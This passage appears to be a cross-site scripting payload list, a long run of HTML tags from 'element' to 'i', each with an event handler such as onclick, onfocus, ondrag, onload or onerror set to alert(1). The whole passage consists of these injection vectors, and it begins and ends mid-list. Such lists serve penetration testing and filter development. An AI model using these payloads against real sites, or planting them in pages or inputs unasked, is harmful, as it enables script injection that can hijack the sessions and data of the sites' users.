tabindex=1 id=x></element><input autofocus> +<element onclick="alert(1)">test</element> +<element oncontextmenu="alert(1)">test</element> +<element oncopy="alert(1)" contenteditable>test</element> +<element oncut="alert(1)" contenteditable>test</element> +<element ondblclick="alert(1)">test</element> +<element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus> +<element onkeydown="alert(1)" contenteditable>test</element> +<element onkeypress="alert(1)" contenteditable>test</element> +<element onkeyup="alert(1)" contenteditable>test</element> +<element onmousedown="alert(1)">test</element> +<element onmouseenter="alert(1)">test</element> +<element onmouseleave="alert(1)">test</element> +<element onmousemove="alert(1)">test</element> +<element onmouseout="alert(1)">test</element> +<element onmouseover="alert(1)">test</element> +<element onmouseup="alert(1)">test</element> +<element onpaste="alert(1)" contenteditable>test</element> +<em draggable="true" ondrag="alert(1)">test</em> +<em draggable="true" ondragend="alert(1)">test</em> +<em draggable="true" ondragenter="alert(1)">test</em> +<em draggable="true" ondragleave="alert(1)">test</em> +<em draggable="true" ondragstart="alert(1)">test</em> +<em id=x tabindex=1 onactivate=alert(1)></em> +<em id=x tabindex=1 onbeforeactivate=alert(1)></em> +<em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus> +<em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus> +<em id=x tabindex=1 onfocus=alert(1)></em> +<em id=x tabindex=1 onfocusin=alert(1)></em> +<em onbeforecopy="alert(1)" contenteditable>test</em> +<em onbeforecut="alert(1)" contenteditable>test</em> +<em onbeforepaste="alert(1)" contenteditable>test</em> +<em onblur=alert(1) tabindex=1 id=x></em><input autofocus> +<em onclick="alert(1)">test</em> +<em oncontextmenu="alert(1)">test</em> +<em oncopy="alert(1)" contenteditable>test</em> +<em oncut="alert(1)" contenteditable>test</em> +<em ondblclick="alert(1)">test</em> +<em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus> +<em onkeydown="alert(1)" contenteditable>test</em> +<em onkeypress="alert(1)" contenteditable>test</em> +<em onkeyup="alert(1)" contenteditable>test</em> +<em onmousedown="alert(1)">test</em> +<em onmouseenter="alert(1)">test</em> +<em onmouseleave="alert(1)">test</em> +<em onmousemove="alert(1)">test</em> +<em onmouseout="alert(1)">test</em> +<em onmouseover="alert(1)">test</em> +<em onmouseup="alert(1)">test</em> +<em onpaste="alert(1)" contenteditable>test</em> +<embed draggable="true" ondrag="alert(1)">test</embed> +<embed draggable="true" ondragend="alert(1)">test</embed> +<embed draggable="true" ondragenter="alert(1)">test</embed> +<embed draggable="true" ondragleave="alert(1)">test</embed> +<embed draggable="true" ondragstart="alert(1)">test</embed> +<embed id=x onfocus=alert(1) type=text/html> +<embed id=x onfocusin=alert(1) type=text/html> +<embed id=x tabindex=1 onactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforeactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus> +<embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus> +<embed onbeforecopy="alert(1)" contenteditable>test</embed> +<embed onbeforecut="alert(1)" contenteditable>test</embed> +<embed onbeforepaste="alert(1)" contenteditable>test</embed> +<embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onclick="alert(1)">test</embed> +<embed oncontextmenu="alert(1)">test</embed> +<embed oncopy="alert(1)" contenteditable>test</embed> +<embed oncut="alert(1)" contenteditable>test</embed> +<embed ondblclick="alert(1)">test</embed> +<embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onkeydown="alert(1)" contenteditable>test</embed> +<embed onkeypress="alert(1)" contenteditable>test</embed> +<embed onkeyup="alert(1)" contenteditable>test</embed> +<embed onmousedown="alert(1)">test</embed> +<embed onmouseenter="alert(1)">test</embed> +<embed onmouseleave="alert(1)">test</embed> +<embed onmousemove="alert(1)">test</embed> +<embed onmouseout="alert(1)">test</embed> +<embed onmouseover="alert(1)">test</embed> +<embed onmouseup="alert(1)">test</embed> +<embed onpaste="alert(1)" contenteditable>test</embed> +<embed src=/ onload=alert(1)> +<embed src=1 onerror=alert(1) type=image/gif> +<fieldset draggable="true" ondrag="alert(1)">test</fieldset> +<fieldset draggable="true" ondragend="alert(1)">test</fieldset> +<fieldset draggable="true" ondragenter="alert(1)">test</fieldset> +<fieldset draggable="true" ondragleave="alert(1)">test</fieldset> +<fieldset draggable="true" ondragstart="alert(1)">test</fieldset> +<fieldset id=x tabindex=1 onactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus> +<fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus> +<fieldset id=x tabindex=1 onfocus=alert(1)></fieldset> +<fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset> +<fieldset onbeforecopy="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforecut="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforepaste="alert(1)" contenteditable>test</fieldset> +<fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onclick="alert(1)">test</fieldset> +<fieldset oncontextmenu="alert(1)">test</fieldset> +<fieldset oncopy="alert(1)" contenteditable>test</fieldset> +<fieldset oncut="alert(1)" contenteditable>test</fieldset> +<fieldset ondblclick="alert(1)">test</fieldset> +<fieldset onfocusout=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onkeydown="alert(1)" contenteditable>test</fieldset> +<fieldset onkeypress="alert(1)" contenteditable>test</fieldset> +<fieldset onkeyup="alert(1)" contenteditable>test</fieldset> +<fieldset onmousedown="alert(1)">test</fieldset> +<fieldset onmouseenter="alert(1)">test</fieldset> +<fieldset onmouseleave="alert(1)">test</fieldset> +<fieldset onmousemove="alert(1)">test</fieldset> +<fieldset onmouseout="alert(1)">test</fieldset> +<fieldset onmouseover="alert(1)">test</fieldset> +<fieldset onmouseup="alert(1)">test</fieldset> +<fieldset onpaste="alert(1)" contenteditable>test</fieldset> +<figcaption draggable="true" ondrag="alert(1)">test</figcaption> +<figcaption draggable="true" ondragend="alert(1)">test</figcaption> +<figcaption draggable="true" ondragenter="alert(1)">test</figcaption> +<figcaption draggable="true" ondragleave="alert(1)">test</figcaption> +<figcaption draggable="true" ondragstart="alert(1)">test</figcaption> +<figcaption id=x tabindex=1 onactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforeactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus> +<figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus> +<figcaption id=x tabindex=1 onfocus=alert(1)></figcaption> +<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption> +<figcaption onbeforecopy="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforecut="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforepaste="alert(1)" contenteditable>test</figcaption> +<figcaption onblur=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onclick="alert(1)">test</figcaption> +<figcaption oncontextmenu="alert(1)">test</figcaption> +<figcaption oncopy="alert(1)" contenteditable>test</figcaption> +<figcaption oncut="alert(1)" contenteditable>test</figcaption> +<figcaption ondblclick="alert(1)">test</figcaption> +<figcaption onfocusout=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onkeydown="alert(1)" contenteditable>test</figcaption> +<figcaption onkeypress="alert(1)" contenteditable>test</figcaption> +<figcaption onkeyup="alert(1)" contenteditable>test</figcaption> +<figcaption onmousedown="alert(1)">test</figcaption> +<figcaption onmouseenter="alert(1)">test</figcaption> +<figcaption onmouseleave="alert(1)">test</figcaption> +<figcaption onmousemove="alert(1)">test</figcaption> +<figcaption onmouseout="alert(1)">test</figcaption> +<figcaption onmouseover="alert(1)">test</figcaption> +<figcaption onmouseup="alert(1)">test</figcaption> +<figcaption onpaste="alert(1)" contenteditable>test</figcaption> +<figure draggable="true" ondrag="alert(1)">test</figure> +<figure draggable="true" ondragend="alert(1)">test</figure> +<figure draggable="true" ondragenter="alert(1)">test</figure> +<figure draggable="true" ondragleave="alert(1)">test</figure> +<figure draggable="true" ondragstart="alert(1)">test</figure> +<figure id=x tabindex=1 onactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforeactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus> +<figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus> +<figure id=x tabindex=1 onfocus=alert(1)></figure> +<figure id=x tabindex=1 onfocusin=alert(1)></figure> +<figure onbeforecopy="alert(1)" contenteditable>test</figure> +<figure onbeforecut="alert(1)" contenteditable>test</figure> +<figure onbeforepaste="alert(1)" contenteditable>test</figure> +<figure onblur=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onclick="alert(1)">test</figure> +<figure oncontextmenu="alert(1)">test</figure> +<figure oncopy="alert(1)" contenteditable>test</figure> +<figure oncut="alert(1)" contenteditable>test</figure> +<figure ondblclick="alert(1)">test</figure> +<figure onfocusout=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onkeydown="alert(1)" contenteditable>test</figure> +<figure onkeypress="alert(1)" contenteditable>test</figure> +<figure onkeyup="alert(1)" contenteditable>test</figure> +<figure onmousedown="alert(1)">test</figure> +<figure onmouseenter="alert(1)">test</figure> +<figure onmouseleave="alert(1)">test</figure> +<figure onmousemove="alert(1)">test</figure> +<figure onmouseout="alert(1)">test</figure> +<figure onmouseover="alert(1)">test</figure> +<figure onmouseup="alert(1)">test</figure> +<figure onpaste="alert(1)" contenteditable>test</figure> +<font draggable="true" ondrag="alert(1)">test</font> +<font draggable="true" ondragend="alert(1)">test</font> +<font draggable="true" ondragenter="alert(1)">test</font> +<font draggable="true" ondragleave="alert(1)">test</font> +<font draggable="true" ondragstart="alert(1)">test</font> +<font id=x tabindex=1 onactivate=alert(1)></font> +<font id=x tabindex=1 onbeforeactivate=alert(1)></font> +<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus> +<font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus> +<font id=x tabindex=1 onfocus=alert(1)></font> +<font id=x tabindex=1 onfocusin=alert(1)></font> +<font onbeforecopy="alert(1)" contenteditable>test</font> +<font onbeforecut="alert(1)" contenteditable>test</font> +<font onbeforepaste="alert(1)" contenteditable>test</font> +<font onblur=alert(1) tabindex=1 id=x></font><input autofocus> +<font onclick="alert(1)">test</font> +<font oncontextmenu="alert(1)">test</font> +<font oncopy="alert(1)" contenteditable>test</font> +<font oncut="alert(1)" contenteditable>test</font> +<font ondblclick="alert(1)">test</font> +<font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus> +<font onkeydown="alert(1)" contenteditable>test</font> +<font onkeypress="alert(1)" contenteditable>test</font> +<font onkeyup="alert(1)" contenteditable>test</font> +<font onmousedown="alert(1)">test</font> +<font onmouseenter="alert(1)">test</font> +<font onmouseleave="alert(1)">test</font> +<font onmousemove="alert(1)">test</font> +<font onmouseout="alert(1)">test</font> +<font onmouseover="alert(1)">test</font> +<font onmouseup="alert(1)">test</font> +<font onpaste="alert(1)" contenteditable>test</font> +<footer draggable="true" ondrag="alert(1)">test</footer> +<footer draggable="true" ondragend="alert(1)">test</footer> +<footer draggable="true" ondragenter="alert(1)">test</footer> +<footer draggable="true" ondragleave="alert(1)">test</footer> +<footer draggable="true" ondragstart="alert(1)">test</footer> +<footer id=x tabindex=1 onactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus> +<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus> +<footer id=x tabindex=1 onfocus=alert(1)></footer> +<footer id=x tabindex=1 onfocusin=alert(1)></footer> +<footer onbeforecopy="alert(1)" contenteditable>test</footer> +<footer onbeforecut="alert(1)" contenteditable>test</footer> +<footer onbeforepaste="alert(1)" contenteditable>test</footer> +<footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onclick="alert(1)">test</footer> +<footer oncontextmenu="alert(1)">test</footer> +<footer oncopy="alert(1)" contenteditable>test</footer> +<footer oncut="alert(1)" contenteditable>test</footer> +<footer ondblclick="alert(1)">test</footer> +<footer onfocusout=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onkeydown="alert(1)" contenteditable>test</footer> +<footer onkeypress="alert(1)" contenteditable>test</footer> +<footer onkeyup="alert(1)" contenteditable>test</footer> +<footer onmousedown="alert(1)">test</footer> +<footer onmouseenter="alert(1)">test</footer> +<footer onmouseleave="alert(1)">test</footer> +<footer onmousemove="alert(1)">test</footer> +<footer onmouseout="alert(1)">test</footer> +<footer onmouseover="alert(1)">test</footer> +<footer onmouseup="alert(1)">test</footer> +<footer onpaste="alert(1)" contenteditable>test</footer> +<form draggable="true" ondrag="alert(1)">test</form> +<form draggable="true" ondragend="alert(1)">test</form> +<form draggable="true" ondragenter="alert(1)">test</form> +<form draggable="true" ondragleave="alert(1)">test</form> +<form draggable="true" ondragstart="alert(1)">test</form> +<form id=x tabindex=1 onactivate=alert(1)></form> +<form id=x tabindex=1 onbeforeactivate=alert(1)></form> +<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus> +<form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus> +<form id=x tabindex=1 onfocus=alert(1)></form> +<form id=x tabindex=1 onfocusin=alert(1)></form> +<form onbeforecopy="alert(1)" contenteditable>test</form> +<form onbeforecut="alert(1)" contenteditable>test</form> +<form onbeforepaste="alert(1)" contenteditable>test</form> +<form onblur=alert(1) tabindex=1 id=x></form><input autofocus> +<form onclick="alert(1)">test</form> +<form oncontextmenu="alert(1)">test</form> +<form oncopy="alert(1)" contenteditable>test</form> +<form oncut="alert(1)" contenteditable>test</form> +<form ondblclick="alert(1)">test</form> +<form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus> +<form onkeydown="alert(1)" contenteditable>test</form> +<form onkeypress="alert(1)" contenteditable>test</form> +<form onkeyup="alert(1)" contenteditable>test</form> +<form onmousedown="alert(1)">test</form> +<form onmouseenter="alert(1)">test</form> +<form onmouseleave="alert(1)">test</form> +<form onmousemove="alert(1)">test</form> +<form onmouseout="alert(1)">test</form> +<form onmouseover="alert(1)">test</form> +<form onmouseup="alert(1)">test</form> +<form onpaste="alert(1)" contenteditable>test</form> +<form onreset=alert(1)><input type=reset> +<form onsubmit=alert(1)><input type=submit> +<form><input oninvalid=alert(1) required><input type=submit> +<form><input type=search onsearch=alert(1) value="Hit return" autofocus> +<form><textarea oninvalid=alert(1) required><input type=submit> +<frame draggable="true" ondrag="alert(1)">test</frame> +<frame draggable="true" ondragend="alert(1)">test</frame> +<frame draggable="true" ondragenter="alert(1)">test</frame> +<frame draggable="true" ondragleave="alert(1)">test</frame> +<frame draggable="true" ondragstart="alert(1)">test</frame> +<frame id=x tabindex=1 onactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus> +<frame id=x tabindex=1 ondeactivate=alert(1)></frame><input id=y autofocus> +<frame onbeforecopy="alert(1)" contenteditable>test</frame> +<frame onbeforecut="alert(1)" contenteditable>test</frame> +<frame onbeforepaste="alert(1)" contenteditable>test</frame> +<frame onblur=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onclick="alert(1)">test</frame> +<frame oncontextmenu="alert(1)">test</frame> +<frame oncopy="alert(1)" contenteditable>test</frame> +<frame oncut="alert(1)" contenteditable>test</frame> +<frame ondblclick="alert(1)">test</frame> +<frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onkeydown="alert(1)" contenteditable>test</frame> +<frame onkeypress="alert(1)" contenteditable>test</frame> +<frame onkeyup="alert(1)" contenteditable>test</frame> +<frame onmousedown="alert(1)">test</frame> +<frame onmouseenter="alert(1)">test</frame> +<frame onmouseleave="alert(1)">test</frame> +<frame onmousemove="alert(1)">test</frame> +<frame onmouseout="alert(1)">test</frame> +<frame onmouseover="alert(1)">test</frame> +<frame onmouseup="alert(1)">test</frame> +<frame onpaste="alert(1)" contenteditable>test</frame> +<frameset draggable="true" ondrag="alert(1)">test</frameset> +<frameset draggable="true" ondragend="alert(1)">test</frameset> +<frameset draggable="true" ondragenter="alert(1)">test</frameset> +<frameset draggable="true" ondragleave="alert(1)">test</frameset> +<frameset draggable="true" ondragstart="alert(1)">test</frameset> +<frameset id=x tabindex=1 onactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforeactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus> +<frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus> +<frameset id=x tabindex=1 onfocus=alert(1)></frameset> +<frameset id=x tabindex=1 onfocusin=alert(1)></frameset> +<frameset onbeforecopy="alert(1)" contenteditable>test</frameset> +<frameset onbeforecut="alert(1)" contenteditable>test</frameset> +<frameset onbeforepaste="alert(1)" contenteditable>test</frameset> +<frameset onblur=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onclick="alert(1)">test</frameset> +<frameset oncontextmenu="alert(1)">test</frameset> +<frameset oncopy="alert(1)" contenteditable>test</frameset> +<frameset oncut="alert(1)" contenteditable>test</frameset> +<frameset ondblclick="alert(1)">test</frameset> +<frameset onfocusout=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onkeydown="alert(1)" contenteditable>test</frameset> +<frameset onkeypress="alert(1)" contenteditable>test</frameset> +<frameset onkeyup="alert(1)" contenteditable>test</frameset> +<frameset onmousedown="alert(1)">test</frameset> +<frameset onmouseenter="alert(1)">test</frameset> +<frameset onmouseleave="alert(1)">test</frameset> +<frameset onmousemove="alert(1)">test</frameset> +<frameset onmouseout="alert(1)">test</frameset> +<frameset onmouseover="alert(1)">test</frameset> +<frameset onmouseup="alert(1)">test</frameset> +<frameset onpageshow=alert(1)> +<frameset onpaste="alert(1)" contenteditable>test</frameset> +<frameset><frame id=x onfocus=alert(1)> +<frameset><frame id=x onfocusin=alert(1)> +<frameset><frame onload=alert(1)> +<h1 draggable="true" ondrag="alert(1)">test</h1> +<h1 draggable="true" ondragend="alert(1)">test</h1> +<h1 draggable="true" ondragenter="alert(1)">test</h1> +<h1 draggable="true" ondragleave="alert(1)">test</h1> +<h1 draggable="true" ondragstart="alert(1)">test</h1> +<h1 id=x tabindex=1 onactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></h1><input autofocus> +<h1 id=x tabindex=1 ondeactivate=alert(1)></h1><input id=y autofocus> +<h1 id=x tabindex=1 onfocus=alert(1)></h1> +<h1 id=x tabindex=1 onfocusin=alert(1)></h1> +<h1 onbeforecopy="alert(1)" contenteditable>test</h1> +<h1 onbeforecut="alert(1)" contenteditable>test</h1> +<h1 onbeforepaste="alert(1)" contenteditable>test</h1> +<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onclick="alert(1)">test</h1> +<h1 oncontextmenu="alert(1)">test</h1> +<h1 oncopy="alert(1)" contenteditable>test</h1> +<h1 oncut="alert(1)" contenteditable>test</h1> +<h1 ondblclick="alert(1)">test</h1> +<h1 onfocusout=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onkeydown="alert(1)" contenteditable>test</h1> +<h1 onkeypress="alert(1)" contenteditable>test</h1> +<h1 onkeyup="alert(1)" contenteditable>test</h1> +<h1 onmousedown="alert(1)">test</h1> +<h1 onmouseenter="alert(1)">test</h1> +<h1 onmouseleave="alert(1)">test</h1> +<h1 onmousemove="alert(1)">test</h1> +<h1 onmouseout="alert(1)">test</h1> +<h1 onmouseover="alert(1)">test</h1> +<h1 onmouseup="alert(1)">test</h1> +<h1 onpaste="alert(1)" contenteditable>test</h1> +<head draggable="true" ondrag="alert(1)">test</head> +<head draggable="true" ondragend="alert(1)">test</head> +<head draggable="true" ondragenter="alert(1)">test</head> +<head draggable="true" ondragleave="alert(1)">test</head> +<head draggable="true" ondragstart="alert(1)">test</head> +<head id=x tabindex=1 onactivate=alert(1)></head> +<head id=x tabindex=1 onbeforeactivate=alert(1)></head> +<head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus> +<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus> +<head id=x tabindex=1 onfocus=alert(1)></head> +<head id=x tabindex=1 onfocusin=alert(1)></head> +<head onbeforecopy="alert(1)" contenteditable>test</head> +<head onbeforecut="alert(1)" contenteditable>test</head> +<head onbeforepaste="alert(1)" contenteditable>test</head> +<head onblur=alert(1) tabindex=1 id=x></head><input autofocus> +<head onclick="alert(1)">test</head> +<head oncontextmenu="alert(1)">test</head> +<head oncopy="alert(1)" contenteditable>test</head> +<head oncut="alert(1)" contenteditable>test</head> +<head ondblclick="alert(1)">test</head> +<head onfocusout=alert(1) tabindex=1 id=x></head><input autofocus> +<head onkeydown="alert(1)" contenteditable>test</head> +<head onkeypress="alert(1)" contenteditable>test</head> +<head onkeyup="alert(1)" contenteditable>test</head> +<head onmousedown="alert(1)">test</head> +<head onmouseenter="alert(1)">test</head> +<head onmouseleave="alert(1)">test</head> +<head onmousemove="alert(1)">test</head> +<head onmouseout="alert(1)">test</head> +<head onmouseover="alert(1)">test</head> +<head onmouseup="alert(1)">test</head> +<head onpaste="alert(1)" contenteditable>test</head> +<header draggable="true" ondrag="alert(1)">test</header> +<header draggable="true" ondragend="alert(1)">test</header> +<header draggable="true" ondragenter="alert(1)">test</header> +<header draggable="true" ondragleave="alert(1)">test</header> +<header draggable="true" ondragstart="alert(1)">test</header> +<header id=x tabindex=1 onactivate=alert(1)></header> +<header id=x tabindex=1 onbeforeactivate=alert(1)></header> +<header id=x tabindex=1 onbeforedeactivate=alert(1)></header><input autofocus> +<header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus> +<header id=x tabindex=1 onfocus=alert(1)></header> +<header id=x tabindex=1 onfocusin=alert(1)></header> +<header onbeforecopy="alert(1)" contenteditable>test</header> +<header onbeforecut="alert(1)" contenteditable>test</header> +<header onbeforepaste="alert(1)" contenteditable>test</header> +<header onblur=alert(1) tabindex=1 id=x></header><input autofocus> +<header onclick="alert(1)">test</header> +<header oncontextmenu="alert(1)">test</header> +<header oncopy="alert(1)" contenteditable>test</header> +<header oncut="alert(1)" contenteditable>test</header> +<header ondblclick="alert(1)">test</header> +<header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus> +<header onkeydown="alert(1)" contenteditable>test</header> +<header onkeypress="alert(1)" contenteditable>test</header> +<header onkeyup="alert(1)" contenteditable>test</header> +<header onmousedown="alert(1)">test</header> +<header onmouseenter="alert(1)">test</header> +<header onmouseleave="alert(1)">test</header> +<header onmousemove="alert(1)">test</header> +<header onmouseout="alert(1)">test</header> +<header onmouseover="alert(1)">test</header> +<header onmouseup="alert(1)">test</header> +<header onpaste="alert(1)" contenteditable>test</header> +<hgroup draggable="true" ondrag="alert(1)">test</hgroup> +<hgroup draggable="true" ondragend="alert(1)">test</hgroup> +<hgroup draggable="true" ondragenter="alert(1)">test</hgroup> +<hgroup draggable="true" ondragleave="alert(1)">test</hgroup> +<hgroup draggable="true" ondragstart="alert(1)">test</hgroup> +<hgroup id=x tabindex=1 onactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforeactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus> +<hgroup id=x tabindex=1 ondeactivate=alert(1)></hgroup><input id=y autofocus> +<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup> +<hgroup id=x tabindex=1 onfocusin=alert(1)></hgroup> +<hgroup onbeforecopy="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforecut="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforepaste="alert(1)" contenteditable>test</hgroup> +<hgroup onblur=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onclick="alert(1)">test</hgroup> +<hgroup oncontextmenu="alert(1)">test</hgroup> +<hgroup oncopy="alert(1)" contenteditable>test</hgroup> +<hgroup oncut="alert(1)" contenteditable>test</hgroup> +<hgroup ondblclick="alert(1)">test</hgroup> +<hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onkeydown="alert(1)" contenteditable>test</hgroup> +<hgroup onkeypress="alert(1)" contenteditable>test</hgroup> +<hgroup onkeyup="alert(1)" contenteditable>test</hgroup> +<hgroup onmousedown="alert(1)">test</hgroup> +<hgroup onmouseenter="alert(1)">test</hgroup> +<hgroup onmouseleave="alert(1)">test</hgroup> +<hgroup onmousemove="alert(1)">test</hgroup> +<hgroup onmouseout="alert(1)">test</hgroup> +<hgroup onmouseover="alert(1)">test</hgroup> +<hgroup onmouseup="alert(1)">test</hgroup> +<hgroup onpaste="alert(1)" contenteditable>test</hgroup> +<hr draggable="true" ondrag="alert(1)">test</hr> +<hr draggable="true" ondragend="alert(1)">test</hr> +<hr draggable="true" ondragenter="alert(1)">test</hr> +<hr draggable="true" ondragleave="alert(1)">test</hr> +<hr draggable="true" ondragstart="alert(1)">test</hr> +<hr id=x tabindex=1 onactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus> +<hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus> +<hr id=x tabindex=1 onfocus=alert(1)></hr> +<hr id=x tabindex=1 onfocusin=alert(1)></hr> +<hr onbeforecopy="alert(1)" contenteditable>test</hr> +<hr onbeforecut="alert(1)" contenteditable>test</hr> +<hr onbeforepaste="alert(1)" contenteditable>test</hr> +<hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onclick="alert(1)">test</hr> +<hr oncontextmenu="alert(1)">test</hr> +<hr oncopy="alert(1)" contenteditable>test</hr> +<hr oncut="alert(1)" contenteditable>test</hr> +<hr ondblclick="alert(1)">test</hr> +<hr onfocusout=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onkeydown="alert(1)" contenteditable>test</hr> +<hr onkeypress="alert(1)" contenteditable>test</hr> +<hr onkeyup="alert(1)" contenteditable>test</hr> +<hr onmousedown="alert(1)">test</hr> +<hr onmouseenter="alert(1)">test</hr> +<hr onmouseleave="alert(1)">test</hr> +<hr onmousemove="alert(1)">test</hr> +<hr onmouseout="alert(1)">test</hr> +<hr onmouseover="alert(1)">test</hr> +<hr onmouseup="alert(1)">test</hr> +<hr onpaste="alert(1)" contenteditable>test</hr> +<html draggable="true" ondrag="alert(1)">test</html> +<html draggable="true" ondragend="alert(1)">test</html> +<html draggable="true" ondragenter="alert(1)">test</html> +<html draggable="true" ondragleave="alert(1)">test</html> +<html draggable="true" ondragstart="alert(1)">test</html> +<html id=x tabindex=1 onactivate=alert(1)></html> +<html id=x tabindex=1 onbeforeactivate=alert(1)></html> +<html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus> +<html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus> +<html id=x tabindex=1 onfocus=alert(1)></html> +<html id=x tabindex=1 onfocusin=alert(1)></html> +<html onbeforecopy="alert(1)" contenteditable>test</html> +<html onbeforecut="alert(1)" contenteditable>test</html> +<html onbeforepaste="alert(1)" contenteditable>test</html> +<html onblur=alert(1) tabindex=1 id=x></html><input autofocus> +<html onclick="alert(1)">test</html> +<html oncontextmenu="alert(1)">test</html> +<html oncopy="alert(1)" contenteditable>test</html> +<html oncut="alert(1)" contenteditable>test</html> +<html ondblclick="alert(1)">test</html> +<html onfocusout=alert(1) tabindex=1 id=x></html><input autofocus> +<html onkeydown="alert(1)" contenteditable>test</html> +<html onkeypress="alert(1)" contenteditable>test</html> +<html onkeyup="alert(1)" contenteditable>test</html> +<html onmousedown="alert(1)">test</html> +<html onmouseenter="alert(1)">test</html> +<html onmouseleave="alert(1)">test</html> +<html onmousemove="alert(1)">test</html> +<html onmouseout="alert(1)">test</html> +<html onmouseover="alert(1)">test</html> +<html onmouseup="alert(1)">test</html> +<html onpaste="alert(1)" contenteditable>test</html> +<i draggable="true" ondrag="alert(1)">test</i> +<i draggable="true" ondragend="alert(1)">test</i> +<i draggable="true" ondragenter="alert(1)">test</i> +<i draggable="true" ondragleave="alert(1)">test</i> +<i draggable="true" ondragstart="alert(1)">test</i> +<i id=x tabindex=1 onactivate=alert(1)></i> +<i id=x tabindex=1 onbeforeactivate=alert(1)></i> +<i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus> +<i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus> +<i id=x tabindex=1 onfocus=alert(1)></i> +<i id=x tabindex=1 onfocusin=alert(1)></i> +<i onbeforecopy="alert(1)" contenteditable>test</i> +<i onbeforecut="alert(1)" contenteditable>test</i> +<i onbeforepaste="alert(1)" contenteditable>test</i> +<i onblur=alert(1) tabindex=1 id=x></i><input autofocus> +<i onclick="alert(1)">test</i> +<i oncontextmenu="alert(1)">test</i> +<i oncopy="alert(1)" contenteditable>test</i> +<i oncut="alert(1)" contenteditable>test</i> +<i ondblclick="alert(1)">test</i> +<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus> +<i onkeydown="alert(1)" contenteditable>test</i> +<i onkeypress="alert(1)" contenteditable>test</i> +<i onkeyup="alert(1)" contenteditable>test</i> +<i onmousedown="alert(1)">test</i> +<i onmouseenter="alert(1)">test</i> +<i onmouseleave="alert(1)">test</i> +<i onmousemove="alert(1)">test</i> 